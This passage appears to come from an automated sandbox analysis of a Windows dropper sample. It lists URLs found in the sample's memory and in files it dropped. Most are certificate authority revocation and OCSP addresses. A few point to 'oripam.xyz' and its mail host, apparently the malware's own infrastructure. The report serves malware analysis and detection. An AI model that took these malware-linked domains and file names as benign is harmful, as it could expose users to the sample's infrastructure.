srcngmlC.pif, 00000008.00000002.1941264509.000000003003A000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935931113.0000000041374000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.00000000412E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1708520498.000000007FBAF000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1681956629.0000000022551000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1682687395.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1838777437.0000000002A16000.00000004.00001000.00020000.00000000.sdmp, Clmgncrs.PIF, 00000009.00000002.1907994741.0000000002A96000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif.0.drString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
              Source: srcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1881543836.0000000036210000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879294408.0000000034500000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879404870.00000000345E2000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F87000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F97000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353F9000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944537125.0000000035320000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1941264509.000000003003A000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935931113.0000000041374000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.00000000412E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
              Source: srcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F7F000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F8F000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEDF000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.oripam.xyz
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://ocsp.comodoca.com0
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1708520498.000000007FBAF000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1681956629.0000000022551000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1682687395.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1838777437.0000000002A16000.00000004.00001000.00020000.00000000.sdmp, Clmgncrs.PIF, 00000009.00000002.1907994741.0000000002A96000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif.0.drString found in binary or memory: http://ocsp.comodoca.com0$
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://ocsp.sectigo.com0
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://ocsp.sectigo.com0C
              Source: srcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F7F000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F8F000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEDF000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oripam.xyz
              Source: srcngmlC.pif, 00000005.00000002.1876165964.0000000030227000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879294408.0000000034500000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879404870.00000000345E2000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F87000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F97000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353F9000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944537125.0000000035320000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1941264509.000000003004F000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935931113.0000000041374000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.000000004131A000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.00000000412E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0G
              Source: srcngmlC.pif, 00000005.00000002.1876165964.0000000030227000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879294408.0000000034500000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879404870.00000000345E2000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F87000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F97000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353F9000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944537125.0000000035320000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1941264509.000000003004F000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935931113.0000000041374000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.000000004131A000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.00000000412E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
              Source: srcngmlC.pif, 00000005.00000002.1877750905.0000000031F01000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F11000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DE61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1708520498.000000007FBAF000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1681956629.0000000022551000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1682687395.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705852154.00000000225FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1838777437.0000000002A16000.00000004.00001000.00020000.00000000.sdmp, Clmgncrs.PIF, 00000009.00000002.1907994741.0000000002A96000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif.0.drString found in binary or memory: http://www.pmail.com0
